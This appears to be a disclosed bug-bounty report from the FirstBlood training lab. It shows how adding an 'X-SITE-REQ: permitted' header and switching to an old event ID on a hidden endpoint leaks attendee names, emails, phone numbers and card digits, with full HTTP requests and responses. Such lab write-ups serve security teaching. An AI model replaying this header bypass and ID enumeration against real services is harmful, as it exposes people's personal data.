FirstBlood-#70 — Info leak at http://firstbloodhackers.com:49280/attendees/event.php?q=560720
This issue was discovered on FirstBlood v1
On 2021-05-09, 0xconft Level 5 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hi there,
When i accessing http://firstbloodhackers.com:49280/hackerback.html event. I notice this endpoint in it's source
<script>
function getAttendees() {
var attending = false;
if (attending == true) {
sendRequest("/attendees/event.php?q=560720");
}
</script>
When i access that endpoint it's return nothing. But when i add "X-SITE-REQ: permitted" header it's return data of that event
GET /attendees/event.php?q=560720 HTTP/1.1
Host: firstbloodhackers.com:49280
X-SITE-REQ: permitted
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 19:41:33 GMT
Content-Type: application/json
Connection: close
Content-Length: 3267
{"event":[{"id":"560720","title":"HackerBack","description"
-snip-
Nothing interesting from the response except the "old_eventID" parameter that contain the old event id. Which if i accessed the sameway with X-SITE-REQ header it return user's sensitive data
GET /attendees/event.php?q=560700 HTTP/1.1
Host: firstbloodhackers.com:49280
X-SITE-REQ: permitted
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 19:43:21 GMT
Content-Type: application/json
Connection: close
Content-Length: 3622
-snip-
medical-massage.","when":"Monday, May 9th 2021","time":"1:00 - 3:00pm","attendees":[{"name":"Sean R","email":"[email protected]","confirmed":true,"contactNumber":"+44 141 496 0250","last_4_CC":"9090"},{"name":"Trevor B","email":"[email protected]","confirmed":true,"contactNumber":"+44 116 496 0581","last_4_CC":"5323"},{"name":"Julie
-snip-
Best Regards,
0xconft
P1 CRITICAL
Endpoint: /attendees/event.php?q=560700
Parameter: X-SITE-REQ header
Payload: permitted
FirstBlood ID: 13
Vulnerability Type: Information leak/disclosure
/attendees/event can be seen on the HackerBack.html page but has a blank response. Upon further inspection and from making use of the web app, you will notice you can add certain headers in order to interact with this endpoint. An old event ID leaks PII information about attendees.